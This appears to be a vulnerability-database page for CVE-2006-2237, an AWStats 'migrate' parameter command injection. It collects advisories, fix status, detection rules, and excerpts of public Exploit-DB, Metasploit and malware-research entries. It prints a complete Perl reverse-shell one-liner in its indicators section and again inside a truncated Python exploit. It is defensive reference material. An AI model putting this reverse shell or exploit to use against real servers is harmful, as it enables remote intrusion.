CVE-2006-2237
published 2006-05-08CVE-2006-2237: The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in…
PriorityP272medium5.1CVSS 2.0
AVNACHAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
58.36%
99.0th percentile
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| debian | awstats | < awstats 6.5-2 (bookworm) | awstats 6.5-2 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
commandperl -e '$h="<host>";$p=<port>;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };'↗
- →Detect exploitation attempts by monitoring HTTP requests to awstats.pl containing shell metacharacters (pipe '|') in the 'migrate' CGI parameter, especially patterns matching |...|awstats*.txt ↗
- →Alert on HTTP GET requests to /cgi-bin/awstats.pl where the 'migrate' query parameter contains a pipe character followed by commands and ends with a pattern like awstats<digits>.<site>.txt ↗
- →Monitor for the distinctive User-Agent string '[BL4CK] Security' in HTTP requests, which is used by the public exploit PoC for this CVE ↗
- →Monitor for the Referer header value 'http://exploit.by.redsand.of.blacksecurity.org' in requests to awstats.pl, used by the public PoC exploit ↗
- →Detect check/probe requests where the migrate parameter contains 'cat /etc/hosts', used by the Metasploit module's check() function to fingerprint vulnerable targets ↗
- →Monitor for outbound Perl-based reverse shell connections (connect-back) from the web server process, particularly using Socket module with fork+exec /bin/sh pattern ↗
- →The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats config; audit configurations and restrict access to the update functionality as a detection/hardening measure ↗
- ·The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file, which is a non-default setting. Installations that only build static pages are not affected. ↗
- ·Static AWStats deployments (those not using the web-based update feature) are not vulnerable to this CVE. ↗
- ·Affected versions are AWStats 6.4 and 6.5 only; the fix was introduced in 6.6 (Debian fixed in package version 6.5-2). ↗
CVSS provenance
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
osv5.1MEDIUM
vulncheck5.1MEDIUM
vendor_debian5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x4mq-2mhg-3c5x: The web interface for AWStats 6
ghsa_unreviewed·2022-05-01
CVE-2006-2237 [MEDIUM] GHSA-x4mq-2mhg-3c5x: The web interface for AWStats 6
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
OSV
CVE-2006-2237: The web interface for AWStats 6
osv·2006-05-08·CVSS 5.1
CVE-2006-2237 [MEDIUM] CVE-2006-2237: The web interface for AWStats 6
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
VulnCheck
awstats awstats Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2006·CVSS 5.1
CVE-2006-2237 [MEDIUM] awstats awstats Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
awstats awstats Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Affected: awstats awstats
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
Ubuntu
awstats vulnerability
vendor_ubuntu·2006-05-23
CVE-2006-2237 awstats vulnerability
Title: awstats vulnerability
Summary: awstats vulnerability
AWStats did not properly sanitize the 'migrate' CGI parameter. If the
update of the stats via web front-end is allowed, a remote attacker
could execute arbitrary commands on the server with the privileges of
the AWStats server.
This does not affect AWStats installations which only build static
pages.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2006-2237: awstats - The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, ...
vendor_debian·2006·CVSS 5.1
CVE-2006-2237 [MEDIUM] CVE-2006-2237: awstats - The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, ...
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Scope: local
bookworm: resolved (fixed in 6.5-2)
bullseye: resolved (fixed in 6.5-2)
forky: resolved (fixed in 6.5-2)
sid: resolved (fixed in 6.5-2)
trixie: resolved (fixed in 6.5-2)
No detection rules found.
Exploit-DB
AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2006-2237 AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)
AWStats 6.4 'AWStats migrate Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
payloads are recommended with this module. The vulnerability is only
present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
configuration file (non-default).
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
['CVE', '2006-2237'],
['OSVDB', '25284'],
['BID', '17844'],
['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
['URL', 'http://www.milw0rm.com/exploits/1755'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'Requ
Exploit-DB
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow
exploitdb·2007-04-07·CVSS 7.6
CVE-2006-3747 [HIGH] Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow
---
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and 2.0.46 and 2.2.0 and
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our s
Exploit-DB
AWStats 6.5 - 'migrate' Remote Shell Command Injection
exploitdb·2006-05-06
CVE-2006-2237 AWStats 6.5 - 'migrate' Remote Shell Command Injection
AWStats 6.5 - 'migrate' Remote Shell Command Injection
---
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [email protected]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# redsand@jinxy ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#
import sys, socket, base64
import urllib2, urlparse, urllib
# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(
Exploit-DB
AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
exploitdb·2006-05-04
CVE-2006-2237 AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
AWStats 6.4 'AWStats migrate Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
payloads are recommended with this module. The vulnerability is only
present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
configuration file (non-default).
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-2237'],
['OSVDB', '25284'],
['BID', '17844'],
['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
['URL', 'http://www.milw0rm.com/exploits/1755'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd
Metasploit
AWStats migrate Remote Command Execution
metasploit
AWStats migrate Remote Command Execution
AWStats migrate Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default).
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Bugzilla
CVE-2006-2237: awstats arbitrary code execution vulnerability
bugzilla·2006-05-06·CVSS 5.1
CVE-2006-2237 [MEDIUM] CVE-2006-2237: awstats arbitrary code execution vulnerability
CVE-2006-2237: awstats arbitrary code execution vulnerability
+++ This bug was initially created as a clone of Bug #190923 +++
awstats < 6.6 has reportedly an arbitrary code execution vulnerability, fixed in
upstream 6.6. No CVE id yet (I've mailed them), but here's more info:
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
Discussion:
Awstats 6.6 is still in beta and did not work for me (update gave "Use of
uninitialized value in substitution (s///) at ..."), so I backported the fix
from CVS instead (it's a two-liner).
FC-5 and FC-4 versions building, devel is updated to 6.6 and I'll keep it
updated when a new beta arrives.
---
It appears that this is not fixed; the problem is in the unsanitized "migrate"
query string parameter.
---
Fixed, see bug 190923 for
Bugzilla
CVE-2006-2237: awstats arbitrary code execution vulnerability
bugzilla·2006-05-06·CVSS 5.1
CVE-2006-2237 [MEDIUM] CVE-2006-2237: awstats arbitrary code execution vulnerability
CVE-2006-2237: awstats arbitrary code execution vulnerability
awstats < 6.6 has reportedly an arbitrary code execution vulnerability, fixed in
upstream 6.6. No CVE id yet (I've mailed them), but here's more info:
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
Discussion:
Awstats 6.6 is still in beta and did not work for me (update gave "Use of
uninitialized value in substitution (s///) at ..."), so I backported the fix
from CVS instead (it's a two-liner).
FC-5 and FC-4 versions building, devel is updated to 6.6 and I'll keep it
updated when a new beta arrives.
---
It appears that this is not fixed; the problem is in the unsanitized "migrate"
query string parameter.
---
OK, strangely the files in the 6.6 beta tarball are more recent than what I got
from CVS...
http://awstats.sourceforge.net/awstats_security_news.phphttp://secunia.com/advisories/19969http://secunia.com/advisories/20170http://secunia.com/advisories/20186http://secunia.com/advisories/20496http://secunia.com/advisories/20710http://security.gentoo.org/glsa/glsa-200606-06.xmlhttp://www.debian.org/security/2006/dsa-1058http://www.novell.com/linux/security/advisories/2006_33_awstats.htmlhttp://www.osreviews.net/reviews/comm/awstatshttp://www.osvdb.org/25284http://www.securityfocus.com/bid/17844http://www.vupen.com/english/advisories/2006/1678http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/26287https://usn.ubuntu.com/285-1/http://awstats.sourceforge.net/awstats_security_news.phphttp://secunia.com/advisories/19969http://secunia.com/advisories/20170http://secunia.com/advisories/20186http://secunia.com/advisories/20496http://secunia.com/advisories/20710http://security.gentoo.org/glsa/glsa-200606-06.xmlhttp://www.debian.org/security/2006/dsa-1058http://www.novell.com/linux/security/advisories/2006_33_awstats.htmlhttp://www.osreviews.net/reviews/comm/awstatshttp://www.osvdb.org/25284http://www.securityfocus.com/bid/17844http://www.vupen.com/english/advisories/2006/1678http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/26287https://usn.ubuntu.com/285-1/
2006-05-08
Published
Exploited in the wild